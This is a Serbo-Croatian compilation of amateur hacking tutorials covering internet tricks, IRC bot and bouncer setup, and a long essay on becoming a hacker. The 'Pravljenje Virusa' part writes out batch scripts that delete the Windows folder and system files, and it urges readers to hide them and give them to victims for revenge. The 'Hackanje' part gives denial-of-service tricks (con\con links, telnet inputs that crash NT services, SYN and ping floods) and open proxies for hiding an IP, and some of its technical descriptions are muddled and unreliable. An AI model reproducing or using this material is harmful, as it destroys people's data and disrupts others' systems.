Haker

Internet Fazoni
Pravljenje Virusa
miRC Hack
Kako postati HACKER ?
Hackanje
Hack Web
Hackanje Sifre putem ftp.
Dos Hackanje
Crackanje
Windows Trikovi
™Dr.Rame™
-*-*-*--- Hakerski internet fazoni --*-*-*
* U ovom tutoru mozete naci neke veoma korisne

fazone preko interneta. Neke takodjer mozete iskoristit
u hakerske svrhe uglavnom to vi odlucite.
* Access denied (nekoj web stranici)
Zelite li da sprijecite pristup nekoj web stranici

sa vašeg kompjutera? Editujte fajl HOSTS.SAM koji
se nalazi u Windows folderu. Pošto je 127.0.0.1
vaša IP adresa, otkucajte adrese sajtove koje
zelite da zablokirate za ovaj IP.
* Anonimnost na internetu
Identifikacija poziva je sjajna stvar, zar ne?

Medjutim, kada se logujete na Internet, vaš
Internet provajder ce, ukoliko posjedujete
"tonsku" centralu, zabiljeziti broj telefona sa
kojeg ste zvali što moze u nekim slucajevima da
bude nezgodno. Ako vam se ovo ne svidja, dodajte
ispred broja telefona vašeg provajdera broj
"*72#" (bez znaka navoda) i vaš broj telefona
ce biti sakriven! Naravno, ova funkcija radi i
kada zovete bilo koji broj putem fiksnog telefona.
Napomena: nije provjereno na svim "tonskim" centralama
* Brisanje URL adrese u IE
Ukoliko zelite da izbrišete URL adrese u

Internet Exploreru koje se pojavljuju u Address baru
morate podesiti bazu registara. Idite do
HKEY_CURRENT_USER \ Software \Microsoft \ Internet Explorer \
TypedURLs
i tamo obrišite nepozeljne stavke.
Putanja za Windows 2000 je
HKEY_USERS \ S-1-5-
21...\Software\Microsoft\InternetExplorer\TypedURLs
* Fazon u Outlook Express-u
Kada ubacujete mail attachment u Outlook Expressu,

dijalog box vas uvijek vodi u neki folder u kojem,
naravno, nikad nije fajl koji zelite da 'zakacite'.
Ako zelite ovo da promijenite uradite slijedece.
Idite sa Regedit.exe na
HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows
\CurrentVersion \ Explorer \ User Shell Folders.
Kliknite dvaput na Personal key i otkucajte
putanju vašeg omiljenog foldera. Restartujete OS.
* Combine and Decode u Outlook Expressu
Znate li za opciju Combine and Decode u Outlook Expressu?

Selektujte više poruka drzeci CRTL ili SHIFT i
idite do Message menija i stavke 'Combine and Decode...'.
Dobit cete od svih selektovanih poruka jednu veliku
poruku koju npr. mozete da štampate ili nešto slicno.
* Prevodjenje IP adrese
Ukoliko zelite da na najlakši nacin, bez upotrebe

raznih shareware-ova, prevedete IP broj
(npr. 245.84.120.19) u nešto razumljivo i pamtljivo,
idite u DOS i otkucajte NSLOOKUP [IP]
* Vas IP?
Da li zelite saznat vasu IP adresu kada se konektujete na

internet? Otidjite u MS-DOS, i u Windows folderu
utipkajte: IPCONFIG
c:\windows\ipconfig
P.S. "Naravno ove fazone nisam ja otkrio, nego samo sakupio

i ponesto jos dodao (objasnio itd...)
Pravljenje Virusa
Upoznavanje
Dobro došli u još jedan tutorial by BaCkSpAcE. Ovaj tutorial može Vam
pomoći da pravite jednostavne viruse.
Ovdje neću pričati on nekoj naprednoj tehnologiji jer je ovaj tutorial za
početnike. Pa ako ste "elite haker"
ne gubite ovdje vrijeme kad možete obarati sistem Micro$oft-a. hehe...
Ovaj tutorial govori o jednostavnom brisanju fajlova. Pa ako ste se
nadali da ćete uništiti svijet, žao mi je ovaj tutorial nije za tebe.
DOS batch virusi
-su virusi koji se završavaju sa ekstenzijjom .bat. Mogu sadržavati DOS

komande.
Da se malo vratimo kada je KISS vladao svijetom, DOS je bio savršeni
OS.
DOS nije ni malo sličan Windowsu pa ga nije lako koristiti. Zato je
Micro$oft mali
mini-jezik nazvan "batch file". Batch fajlovi su fajlovi koji sadrze
komande koje će kompjuter slijediti.
I ako kažemo da izbrišemo čitav harddisk on će poslušati naredbu. SAda,
jezik je nešto najlakše što treba naučiti
na putu da postaneš haker. Samo trebaš da imaš talenta. Sada treba da
naučiš komande, ja ću neke izlistati ovdje:
Najkorisnije komande su:(molim Vas otvorite još jedan notepad ili word
pad i zapišite komande jer će Vam kasnije trebati)
@echo off - ova komanda će reći kompjuteru da ne pokazuje sve što radi
u datom trenutku. Dobro ako ne želite da user sazna šta program radi.
echo text ovdje - ova komanda će izbaciti riječi text ovdje na ekran.
Recimo ako želite da stavite "ti papcino" na žrtvin ekran, onda bi napisao
echo ti papcino
Lagano, zar ne?
cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u većini

slučajeva C:\). Većinu
vremena ćete koristiti ovo. Kasnije ćete vidjeti zašto.
cd direktorij - ovo otvara direktorij. Pa recimo da ste tipkali komandu
cd\ prije. Sada ste u c:\ zbog cd\ komande, jel tako?Onda recite
kompjuteru
cd windows i tada će kompjuter otvoriti direktorij windows sa c: drajva.
(c:/windows, znate, najvažniji direktorij osim ako nemate linux.)
RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško objasniti.

Ako ste na c:/windows, i koristili ste komandu RD windows
E pa neće raditi glupko, zato što direktorij windows nije u direktoriju
c:/windows/ . Jedini način da ovo radi jeste da budete u c:\ .
Zato što je direktorij windows u c:\ . Nadam se da se niste izgubili ili
zbunili. Ali ovo je teško objasniti potpunim
početnicima, jer ako koristite windows već neko vrijeme ovako
jednostavne komande bi trebali kopčati.
Ako još ne shvatate pošaljite mi email: backspace_np@yahoo.com pa ću
Vam pokušati detaljnije objasniti.
@del fajl - ova komanda briše odredjeni fajl u odredjenom direktoriju pa

ako ste npr u c:/windows/ bilo koji fajl mozete izbrisati kao npr. @del
logo.sys
End - ova komanda završava i izlazi iz programa.
Sada kada znate osnovne komande možemo krenuti sa učenjem kako da

ih pretvorimo u viruse.
Ja mislim da ljudi najbolje uče ako imaju primjer ispred sebe. Pa ću ja
zato koristiti primjere.
Primjer br.1
---------------
@echo off
cd\
rd windows
echo TI glupane
echo hahahahhahaha
echo imam te
echo Vidimo se
echo Vozdrica
end
--------------
Hajmo sad ovo analizirati:
@echo off - govori kompjuter da ne izbacuje sve na ekran tako žrtva
ništa neće znati šta se dešava. hehehe
cd\ govori da se pomjeri u c:\ drajv.
rd windows - govori da deletuje direktorij windows iz c:\ . I to znači
vozdra Windows. hahaha
Ostale komande echo TI glupane....govore kompjuteru....pogodite šta.
End -završava program.
Do sada bi trebao da shvatiš kako ovi virusi rade.

Ali samo zato što je naš tim velikodušan dat ću Vam još jedan primjer.
Primjer br.2
--------------------
@echo off
cd\
cd windows
@del win.com
@del win.ini
echo Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo-
End
-------------------
Analiza virusa:
@echo off - govori kompjuteru da bude miran
cd\ - govori kompjuteru da ide na c:\
cd windows - govori kompjuteru da ide sa c:\ na c:\windows
@del win.com - govori kompjuteru da izbriše win.com iz direktorija
windows
@del win.ini - govori kompjuteru da izbriše win.ini iz direktorija windows
echo Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo- Ako ne znaš
šta znači sad me ubij
End - kraj
Nadam ste da ste zapisali osnovne komande u notepad ili šta već.
Sada je vrijeme da saznate kako da sačuvate fajl, zar ne? Pa to je lako.
U Notepadu ćete da kliknete na File> Save As> ukucajte ime fajla
koje Vi sami želite ali da na kraju upišete .bat
(Npr. mojprogram.bat mojvirus.bat klikni.bat itd itd)
I onda ga posaljite na web ili ga dajte svojoj žrtvi on što treba da uradi
jeste da ga pokrene i on je gotov.
UPOZORENJE: Nemojte sa ovim jednostavnim virusima neke veće

kompanije uznemiravati jer ste onda nadrljali.
I ako Vi pokrenete taj svoj virus onda ste vi nadrapali.
Bilo kako bilo ovo je kraj ovog tutoriala. Nadam ste da ste uživali čitajući
ga. Ja sam se zabavljao dok sam ga pisao.
Ovakve stvari, virusi bi trebali biti korišteni samo za osvetu.
miRC
E pa ovako da krenemo od samog pocetka ... znaci skinete miRC sa

adrese http://www.mirc.com/get.html zatim instalirate ... startujete
idete na options (2 ikonica gore)
Zatim, /connect/add ... prvi red je "Description" tu upisite samo ime

servera il' sta hocete sve jedno ... IRC Server (na kraju cu napisati listu
svih YU i jos ponekih irc servera za koje znam) Port - obicno je 6667 -
group nista .. pass. - nista - add : ) i samo connect to IRC server.
Kada ste se povezali na server kucate /list da vidite sve kanale ...
kliknete dva puta na zeljeni kanal i tamo ste ... komnda za ulazak na neki
kanal je "/join #kanal" ... =)
E,sad idemo na ono ... Kako da instaliram bota ? : )

E,pa ovako ... da bi doveli bota na IRC morate da imate shell koji
podrzava EggDrop ... odma' zaboravite na one free shell-ove jer od toga
nema nista ... vec nabavite nekako ... npr idite na irc.dal.net #shell
#shellx #shellz pa trgujte malo (retko ko nije prevarant) ; )
www.egghelp.com ... skinite EggDrop koliko ja znam poslenja je
EggDrop1.6.6 ... a po meni najbolja 1.4.5 verzija : )
Onda raspakujte eggdrop u neki direktorijum i sredite fajl
"eggdrop.conf" pod ovo "sredite" podrazumevam:
Nick Bota,Realname,Server,ako hocete neku scriptu da dodate kao sto je
"bseen" ... i jos neke gluposti ... ako ste bas lame posaljite mi mail i
poslacu vam sredjen conf file : )
Kada ste nabavili shell nakacite se na FTP ... host - host shell-a - user
pass ... ma sta vam pisem ovo to valjda znate? : )
Nakacili ste se na shell ? prebacite EggDrop1.4.5.tar.gz na shell
Idite u Start/run pa kucajte telnet : )
onda na connect/remote system i tu upisete host shell-a i port : )
Ako je sve cool onda cool : )
kucajte ovako ...
tar zxfv eggdrop.1.4.5.tar.gz (kompajlira)
nakaci se na ftp i prebaci "eggdrop.conf" u direktorijum "eggdrop1.4.5"
vrati se na telnet i kucaj "cd eggdrop1.4.5" zatim ...
./configure
make
make install
./eggdrop -m eggdrop.conf.dist
Nakacite se na server na kome je bot i kucajte /msg BOTnick hello
onda ce on tu nesto smara da si ti owner itd ...
onda setuj pass /msg [botnick] pass "tvoj pass"
... kucas /chat [BOTnick] ... trazice ti pass .... I TO JE TO : )
osnovne komande na botu ...
Dodavanje usera - .+user
Brisanje user .-user [Nick]
Dodavanje hosta .+host [nick] [host]
Ako hoces da dovedes bota na neki kanal kucaj .+chan #kanal
A da zaboravih gore da napisem .. dodavanje flagova ... op - user, m -
master, n - owner, a - auto op dovoljno za sada ... dodavanje flagova se
vrsi komandom .chattr [nick] +[jedan od navedenih gore] TO ti je
dovoljno za sada detaljnije upustvo ces dobiti na adresi
www.egghelp.com
aaa vec mi je muka ... sad idemo na instaliranje BNC-a : ) znate ono 24h
dnevno vas nick na irc-u : ) yeah : )
Logujete se na shell ... kao ono za bota : ) i kucate

"lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz"
on ce ga tu downlouduje
Dalje kucate ...
tar -zxvf psyBNC2.2.1.tar.gz
cd psybnc
make
make menuconfig
make
i ./psybnc pokrecete BNC i sve je spremno ... ukljucite miRC i
konektujete se na server i port koji ste setovali
KAKO SAKRITI IP ?!
Ukljucite miRC/options/Firewall ... chekirate "Use SOCKS firewall"

Protocol - Socks4 | Host - AAubervilliers-101-2-1-63.abo.wanadoo.fr |
userID - nista | pass - nista |
port - 1080 |
evo jos nekih koji rade po istom principu ...
host - mail.bias.bm | port - 1080

host - 212.136.228.242 | port - 1080
host - server1.scottsbluff.sykes.com | port - 1080
... NickServ,ChanServ,MemoServ,SeenServ ...
.. Blah ovo je po meni shit ... bilo je bolje dok nije bilo chanserv-a .. ono
dobijes op ... TakeOver ubacis bota i ql ; ) ali sta je tu je : )
Evo nekih osnovnih komandi koje bi trebalo da znate na BalcanNet-u ...
/msg nickserv register [pass] [email] - registrovanje nick-a
/msg chanserv register [#kanal] [pass] [opis kanala] - registrovanje
kanala
/msg chanserv access [#kanal] add *!*ident@* [level] - dodavanje
access-a
/msg memoserv real all - citanje poruka
/msg seenserv seen [nick] - seen
Evo nekih servera :
BalcanNet
irc.drenik.net
irc.yubc.net - po meni najbolji
irc.verat.net
irc.rstel.net
irc.studio-b.co.yu
irc.planetarion.co.yu
ima ih jos dosta al mislim da su ovi najbolji ... a da, portovi servera je
6667 ...
hmm koji jos znam ... ? a da ...

irc.krstarica.co.yu:6667
irc.cg.yu:6667
irc.tehnicom.net:6667
irc.miss-serbia.com
i najveci irc.dal.net ...
irc.tupacforum.com:6667
irc.zmajevi.net:6667
Kako postati HACKER!
Ovaj tekst nisam ja napisao nego "drakelord" ja sam ga samo prepisao

na forum jer je DOBAR
Gotovo svaki put, kad surfam webom, ircam, citam usenet ili slicno,
naidem na ljude koji razgovaraju o hakiranju, hakerima, sigurnosti i
slicnim temama. Svi novi (newbie) clanovi 'hack-scene' žele u biti
znati kako postati hackerom i žele to uciniti brzo. Stoga, ostvarujuci
tu želju ( koja je, vjerujem, nikla kad je doticni 'novak' gledao neki
film na temu hackera, citao u novinama ili sl. ) prolaze kroz mnoge
komplikacije, primjerice:
- na ircu, usenetu, forumima postavljaju mmnoga pitanja od
kojih su neka glupa (Kako da haknem Hotmail?) i neka pametna (Gdje
da
nadem podrobnije informacije o strukturi TCP/IP skupine protokola?).
- cesto niti ne uce programirati, a vec kooriste eksploite koje
niti razumiju, niti znaju zašto ih koriste i sl.
- puno puta egoizam prevlada pa se dogode izgredi (svade s
iskusnijim korisnicima racunala), najcešce na ircu i slicnim servisima
gdje se odvija 'real-time' direktna komunikacija
- zbog osobnih razloga koriste Denial-of-sservice alate i cine
nepotrebnu štetu (ne znajuci niti kako je alat napisan i što
eksploatira)
Prilikom tih komplikacija se cesto ponize pa promijene nadimak,
e-mail adresu i slicno. Ovaj tekst bi vjerovatno trebao reci 'novacima'
što ciniti da se komplikacije ne dogadaju.
Izraz 'hacker' oznacava osobu koja uci jer VOLI uciti o racunalima.
U mojem rjecniku, 'hacker' znaci isto što i 'majstor od zanata'. Majstor
nekog zanata radi svoj zanat tako dugo dok ga ne dovede do
savršenstva.
U smislu hackera, to je osoba koja uci o nekom podrucju racunalne
znanosti
tako dugo dok to podrucje ne dovede do savršenstva. Dakle, da je u
teoriji
i praksi u tome postigao svoj maksimum. Hakiranje se odnosi na
aktivnost
postizanja tog savršenstva.
Izraz 'hacker' se cesto veže uz racunalnu sigurnost, no to ne mora
biti. Može se vezati uz bilo koje polje racunalne znanosti - grafika,
programiranje, poslovna informatika, administriranje, itd.
Svaki hacker spoznaje nove tehnike i vještine na svojem polju
djelovanja (npr. sigurnost). Te vještine prenosi na osobe koje su manje
iskusne ili pocetnike (npr. napiše tekst o tome što je novo spoznao, a da
to drugi u njegovom polju djelovanja ne znaju). To ga cini onim što jest -
hackerom (npr. 'majstor racunalne sigurnosti').
Od stecenog znanja, osoba mora imati i neke koristi - inace to
znanje ne služi nicemu. Ako se uci samo zato da se voli uciti, a nema
ama baš nikakve koristi od stecenog znanja, onda se vrijeme i trud troše
na krivo! Stoga, ako se uci bez veze, bez odredene i jasne svrhe, osoba
ne može biti majstor niti hacker. Primjerice:
- Tim Backstone uci o racunalnoj grafici. Svaki dan spoznaje nove
vještine crtanja raznih oblika. On uci zato jer ocekuje da ce svojim
znanjem imati financijsku korist.
- Gerald Winston je vec zaposlen kao Windoows programer. On uci o
UNIX sigurnosti u svoje slobodno vrijeme. Svrha njegovog ucenja je da
povisi reputaciju, tj. da njegov doprinos bude zabilježen u javnosti i
da njegovo ime bude poznato šire nego vec jest, a to ce uciniti pišuci
tekstove i savjetujuci korisnike UNIXa.
- Ivo Ladic je srednjoškolac. Polazi matemmaticku gimnaziju. Njega
fasciniraju kriptografski sustavi pa ih vjerno proucava. Posjecuje forume
i dopisuje se s ljudima koji se bave kriptografskim sustavima. On to radi
jer se nada da ce tako dobiti posao u buducnosti.
- Mica Kurtovic je takoder srednjoškolac. Polazi u opcu gimnaziju.
Njega zanima racunalna sigurnost i hackeri. On želi postati hackerom jer
želi haknuti mnogo servera i postati slavan medu hackerima.
Svi primjeri su izmišljeni, no, ocito je da Mica cini nešto krivo.
On od 'hakiranja' servera nece imati nikakvu korist, a kamo li slavu. Bit
ce oštecen:
- financijski (mrežna oprema, mnogo potroššenih impulsa...)
- emocionalno (agresivnost i egoizam ce ojjacati)
- socijalno (društvo ce ga zanemariti, izggubit ce dosadašnje
prijatelje, a nove ce teško steci)
- 'reputacijski' tražit ce ga MUP, FBI, Innterpol... a to ovisi o
aktivnostima (koje bi vjerovatno bile ilegalne)
Stoga, dragi moji lameri, newbaji, rookiji i svi koji želite postati
hackerima, citajte me pažljivo.
Ako želite biti hackerom (na podrucju racunalne sigurnosti -
najcešce), cinite ovako:
1. budite SIGURNI da to želite
2. VJERUJTE da to možete
3. OCEKUJTE korist od svoje aktivnosti i rada (financijska,
socijalna - novi prijatelji, reputacija - da postanete poznatiji, kao primjer
drugima ili slicno, ...)
4. NADAJTE se da ce se ono što ocekujete ispuniti
5. USTRAJTE u toj aktivnosti jer treba vremena i truda da
se postane hacker, odnosno 'majstor'
Sav materijal koji vam je potreban da postanete hacker možete
nabaviti tako da pitate starije hackere. Primjerice, za racunalnu
sigurnost
na podrucju UNIX-a idete, npr. IRC:
irc.dal.net:#unix: Molim vas lijepo, gdje da nadem informacije
o racunalnoj sigurnosti na podrucju UNIXa. Želio bih nauciti što je više
moguce o tome pa pitam vas koji znate više od mene.
Ne bojte se reci da ste novi, da ne znate. Ako priznate da ne znate,
UVIJEK ce vam netko pomoci ako ŽELITE da vam se pomogne. Kineska
poslovica
kaže:
"Kad je ucenik spreman, pojavi se ucitelj."
Takoder, morate znati još nešto važno, a to je razlika izmedu

inteligencije i pameti. Inteligencija je onaj dio vaše osobe koji
omogucuje
bolje, brže pamcenje informacija. Taj dio vam omogucuje da skupite
mnogo
podataka o podrucju o kojem želite uciti. Inteligencija je ono što vam
je UROĐENO, što ste genetski nasljedili. Pamet (emocionalna
inteligencija)
se stjece od rodenja, a na razvoj pameti utjece okolina (knjige, roditelji,
prijatelji, baka, vrijeme, rat, tuca, plac, svade, smijeh, seks...). Pamet
covjek može mijenjati, buduci da na nju utjece okolina, a to cini tako da
mijenja okolinu, npr. ako je dosad bio izložen lošem utjecaju društva i
sam je bio alkoholicar, on odlucuje prestati uzimati alkohol, mijenja
prijatelje, posao, stan i sl. samo da bi promijenio (unaprijedio) svoju
pamet. Dakle,
pamet se odnosi na 'spozaju svojih osjecaja' (zato se zove
*emocionalna*
inteligencija).
*** Zašto je to važno u postajanju hackerom? ***
Vi morate imati oboje da bi postali hackerom. Morate imati

INTELEKT da bi upili potrebno znanje i morate imati PAMET da
bi znali da to želite, možete, da ste spremni preuzeti odgovornosti koje
aktivnost kojom se želite baviti donosi, itd. Ovo sam spomenuo jer
mnogi
vide ZERO_COOLa ili NEA s Matrixa i požele biti 'hax0r'. Ne-ne! Prvo,
PAMET U GLAVU, a onda da vidite da li ste spremni na ono što vam ta
aktivnost
koju ste izabrali donosi. Na snove, zamišljanja o rušenju servera, slavi
koju cete dobiti, filmove, MTV spotove, razgovore na IRCu i forumima i
sl.
se NE OSLANJATI. U obavljanju pravog posla cesto nema
radosti, no treba je biti. Posao je napor i zato je veoma važno da birate
ONO
za ŠTO STE SPOSOBNI. U svakom poslu ima padova i uspona. Shvatite
svaki pad
kao korak bliže uspjehu/rješenju. Problemi su izazovi, a poslom se
izazovi
prihvacaju. Koliko želite prihvatiti izazov i raditi? Koliko možete? Da
li ste uopce sposobni za to? Razmislite još jednom. Vi birate!
"Znanje je poput kamena. Kamenom se mogu napraviti velike

stvari ako ga dobro *upotrijebite*."
Hackanje
SADRZAJ:
------------------
1. Con, Aux i Nul Exploit
(by BaCkSpAcE)
2. SYN Flood Attack

(by BaCkSpAcE)
3. Ping of Death
(by BaCkSpAcE)
4. Exploit za NT 3.5x rachunare

(by BaCkSpAcE)
5. Malo o NT
(by Perun)
6. Stvaranje backspace.bat fajla na serveru

(by BaCkSpAcE)
7. Apache HTTP Server - Exploit

(by Zeroo_Cool, modified by BaCkSpAcE)
8. PHP Path Revealing Vulnerability

(downloaded from Rootshell, translated by BaCkSpAcE)
9. Sakrivanje IP broja u mIRCu

(by BaCkSpAcE}
10. Trik u SoftICE za crackere koji nisu znali

(by BaCkSpAcE)
===============================================
=========
1. Con, Aux i Nul Exploit

-----------------------------------------<
Ovi exploiti provereno rade na Win98 i Win98 SE ali u WinME ne
rade. Oni se javljaju pri ukucavanju sledecih komandi:
c:\con\con
ili c:\aux\aux
ili c:\nul\nul
Nakon ovoga rachunar ce da se zamrzne i jedino reshenje bice

rebootovanje rachunara. Moze da se koristi npr. za Web, tako
shto napravite hiperlink do npr. c:\con\con i kada korisnik pritisne
na to rachunar se zaledi ili slichno. Reshenje problema je skidanje
zakrpe sa Micro$oftovog sajta ili da predjete na Linux, ako to vec
niste uradili.
===============================================
=========
2. SYN Flood Attack

---------------------------------
Shta je to SYN Flood Attack? To je ustvari jedna vrsta Denial of
Service napada.Syn Attack radi tako shto napadach shalje zrtvi
Syn Request da se konektuje na server zrtve, a zrtva odgovara
sa ACK, i rezervishe buffer (mesto u memoriji) za tu konekciju.
Napadach neodgovara sa ACK nego shalje SYN Request ponovo,
i zrtva ponovo odgovara sa AK i odvaja buffer i sve tako dok
zrtva neostane bez Buffer Space i krashira se. Ovom vrstom
necete naneti skoro nikakvu shtetu WebMasteru. On ce morati,
posle SYN Flood Attacka, da rebootuje rachunar. NT je po defaultu
podeshen da shalje SYN-ACK na 3,6,12,24 i 48-oj sekundi. Posle
slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da
dealocira prostor koji je bio zauzet. Znachi napadach ima fore
ukupno 3+6+12+24+48+96 = 189 sekundi.
===============================================
=========
3. Ping of Death
----------------------------
Ping of Death je isto jedna varijanta Denial of Service napada.
Izvodi se tako shto cesh da otkucash 'ping adresa -n 9999999'
i uz to treba da nadjesh rachunare sa brzim linijama.Tako su
gospoda koja je napala yahoo.com i uradila.Uzeli su par mocnih
kompjutera na brzim linijama sa Stanford univerziteta i uradili
'ping www.yahoo.com -n 9999999' i onda je ta linija kojom se
ulazi u Yahoo bila zakrchena velikom kolichinom podataka
(skoro milion pingova) i niko nishta nije mogao uraditi.Naime,
kada se otkuca ova komanda, onda server pochinje da obradjuje
te podatke.Ali poshto je tu ima puno podataka server ce da dugo
dugo radi.Ali ako je to neki slabiji server(mislim na neke klasu
ispod Yahoo), onda ce taj rachunar zablokirati(mozda se chak
i sam resetuje!).Znachi kod slabijih rachunara se dogodi Buffer
Overflow zbog kolichine podataka vece od njegovog buffera,
ali Yahoo je jachi.Izashao je i patch za vecinu ugrozenih
sistema koji onemogucava Efekat Ping of Deatha.
===============================================
=========
4. Exploit za NT 3.5x rachunare

-----------------------------------------------------
a) Ako u toku rada DNSa telnetujete se na port 53 i ako ukucate
10 ili vishe znakova i pritiskom na enter, DNS ce se zaustaviti.
b) Ako se u toku konekcije na Port 135 telnetujete i ukucate 10 ili

vishe znakova i pritiskom na enter, onda ce se korishcenje
procesora popeti na 100%, shto znatno usporava performanse
sistema.
c) Ako se telnetujete na port 1031 i ako ukucate 10 ili vishe

znakova i pritisnete enter, onda ce se IIS zaustaviti.
d) Telnetovanjem na port 80 i ukucavanjem 'GET ../..' takodje

ce zaustaviti IIS.
===============================================
=========
5. Malo o NT
--------------------------------------------------------------
NT koristi jedan na objectima zasnovan model obezbedjenja
sto znaci da se svaki fajl posebno moze obezbediti na serveru.
Model obezbedjenja u NT-u se sastoji iz cetiri dela:
1 Local Securitu Autority

2 Security Account Manager
3 Security Reference Monitor
4 User Interface -UI
NT koristi Server Message Block za kontrolu slanja podataka.

OS od NT ima jedan poseban security nivo I zbog toga on
podrzava vise security-interface-a. Glavno pravilo kod
obezbedjena NT sistema je -koristi zdrav razum (kao na primer
fizicko obezbedjenja servera ). Ovde je bitno naglasiti da NT
ima C2 certifikat Americkog Ministarsva za odbranu samo kao
stand-alone machina -bez diskete-drajva I neprikljucen na
mrezu. NT je prilicno zatvoren sistem ali ima jedno par slabosti
koje hakeri obicno koriste ; Na primer shares - deljene particije
direktorijumi I fajlovi:
- Ako kao administrator delite mape tako dda user Pera ima
kontrolu nad njima ,user Pera moze dalje da kontrolose
direktorijume I mape na kojima ima dovoljne privilegije sto
postane prilicno nezgodno ako user Pera vise nije pravi user
Pera neko haker koji je na jedan od mnogobrojnih nacina preuzeo
njegiv identitet.Zato je potrbno da se svaki share explicitno definira
I ne prihvataju defaul configuracije NT-a jer one omogucavaju
malicioznom useru da npr. "hanguje" sever pod oderdjenim
okolnostima
- Ako haker na jedan ili drugi nacin dobijje fizicki pristup serveru
on moze restartovati server sa DOS disketom I sa ntfsdos.exe
jedne Microsoftove aplikacije dobiti pristup na sve fajlove na
serveru ili radnoj stanici server - bez bilo kakve brige o priveligijama
pravima na njima ..Takodje ako ima CD-ROM sa Linoxom na njemu od
moze da potuno over-raiduje obezbedjnje Servera iz Linuxa tako da
mu uopste nije potreban Administratorov ili bilo ciji drugi password.
Naredna slabost je kod davanja Full controll prava userima - jer pod
tim se podrazumeva jedno skriveno pravo koje se zove File Delete
child I koje je neizbrisivo iz Full control privilegija.Sa tim pravom user
moze da brise read-only files sto moze da bude prilicno nezgodno ako
su ona kljucna za funkcuionisanje NT OS. Jedna od najvaznijih stvari
kod NT obezbedjnja je obezbediti grupu Administratora. Posto clanovi
ove grupe imaju neogranicenu kontrolu, haker ce prvo pokusati da
provali ovaj racun Ukoliko je on suvise dobro obezbedjen haker ce
pokusati da provali racun sa manjim privilegijama a onda sebe doda
grupi administratora (acces-promotion ili t.z.v. step-up attack).
Jedan od najboljih nacina je sve clanove grupe administratora
prebaciti u novu grupu I njoj dati potuna prava (pod drugim imenom)
a onda izbrisati ili ograniciti prava grupe administratora tako da haker
nece znati kojoj grupi I pod kojim imenom mora pripadati da bi dobio
prava administratora. Klasican napad krakera zapocinje time sto ce
sebi pokusati da pribavi password on nekod racuna koji nije toliko
vazan (I obezbedjen) a kasnije pokusati sebe da promovira u racun
sa vise privilegija.Za ovo se koriste t.z.v. brute-power sistemi I
programi koji su nabavljivi djabe na Internetu I koji mogu da u roku
od 7 dana na prosecnoj machini krakrraju passworde I do 16 znakova
dugacke. Za ovo haker mora da dodje do cipherteksta u password
fajlovima Ikoji se cuvaju na serveru u Sam fajlovima I za koje mora
da ima fizicki pristup serveru ili njegovoj fizickoj kopiji (rezervni
serveri - shadow sistemi) I tu dolazi vaznost fizickog pristupa
serveru u prvi plan. Takodje ukljucivanje funkcije Account lockout
otezava posao hakeru (ali I administratoru ako je configuriran na
premali broj pokusaja pa dobija non stop telefoncice od trapavih
usera koji su se zakljucali pogresnim tipkanjem passworda) takodje
I cool-out preiod ne sme biti previse dug jer haker to moze da koristi
za t.z.v. denial of service napade. Takodje dobar racun-policu je na
mestu, cesto menjanje userovih passorda I prisiljavanje usera da
koriste passworde od najmanje 8 znakova I sa ukljucenjem brojeva
,znakova itd kao I koriscenje bezbednisnih programa kao KSA (Kane
security monitor) umanjuju rizik od ovakvih napada. Zbog toga sto se
standardno ne moze ukluciti Account -lockout za Administratorov
racun on je jako ranjiv za ovakve vrste napada .Tu postoji par trikova
da se to izbegne kao davanje drugog imena administratorovom
racunu kao prethodno objasnjeno I onda pravljenje novog usera sa
imenom administrator u dodavanjem njega grupi guests pa mu onda
udaris jedan veoma dugacak password I onda ukljucis audit (koji ne
postoji za administratora) I inda gledas sta se desava I ko sve
pokusava da provali (mamac) "administratorov" racun. Takodje I
zabranjvanje administraturu da se loguje preko networka nego samo
direktno sa konzole umanjuje rizik. Iskljucivanje racuna Guest je
takodje preporuka jer preko njega haker moze da dodje do vaznih
fajlova u registry pod bilo kojim racunom I passwordom.To mu daje
veoma siroka prava I ne samo citanje veoma vaznih fajlova (kao na
primer password fajlova) vec I menjanje osobina fajlova (npr
notepad.exe u haker.exe) kao I pristup veoma vaznim kljucevima
(HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE itd ..kao I
ubacivanje Trojanaca na ovaj nacin koji mogu raditi gotovo sve kao
na primer slanje password fajlova pri restartovanju servera...
Sto se napada sa networka tice najvaznije su slabosti koriscene kod
SMTP i HTTP protokola.Zato se bitno da ovi protokoli imaju samo
pristup (na user-nivou -onim fajlovima ili direktorijumima koji su
neophodni za njihov rad).Takodje I svi TCP/UDP portovoi izmedju 135
I 139 treba da budu zacepljeni u vezi sa odbranom od napada
obaziranih na Secure Message blocks) Narocito kod networka koje
koriste SAMBU za komuniciranje sa Unix hostovima i serverima.
Stavljanjem Web servera koji imaju vezu sa internetom na poseban
subnet zasticen firewallom kao I koriscenje internih firewallova za
poverljive servere je jako preporucljivo. Applikacije kao Alerter i
Messanger kao i koriscenje LAN Menadjera su potencijalne security
rupe jer koriste sisteme obezbedjnje koji su jako slabiji od NT-ovok
standardnog nivoa. Na CD-romu na NT4.0 Microsoft je greskom
postavio program rollback.exe kojemu je namena bila da pomogne
administratorima da rediguju podatke u registriju ali umesto toga
brise sve u njemu.Najbolja opcija je izbrisati ovaj fajl ili u najmanju
ruku promeniti mu ime u nesto nepogodivo da bi se izbegla
zloupotreba od hakera. Ukoliko imate masinu sa dual-butom (Unix,
OS2, Novel ) virusi koji napdaju boot-sektor preko ovih drugih OS-ova
imaju uticaj i na NT (Obicno dobijas nesto kao :Boot device nor
accesible). Takodje u SAMBA okruzenju sve r (remote) komande
trebalo bi biti iskljucene (rlogin,rsh,remsh, itd …). Ukoliko se NT sever
koristi kao FTP server bolje je koristiti FTP od IIS 4.0 jer je bolje
zasticen nego standardni ftp od NT-a. Pri koriscenu RAS-a treba imati
u vidu da RAS sifruje samo password sa MD4-hash funkcijom (koji
moze biti snifovan) ostali podaci putuju networkom nesifrovani.
Ukoliko haker provali password a RAS server je povezan u domain
network on onda ima pristup celom domainu.Zato treba RAS uvek
izolovati na poseban firewallon zasticen network od ostatka LAN-a.
Zbog toga su i aktiviranje audita, verifikacije,sifrovanja,call-back
funkcije nephodno radi zastite networka, specijalno u produkcionim
sistemima i sa sistemima sa osetljivim informacijama.
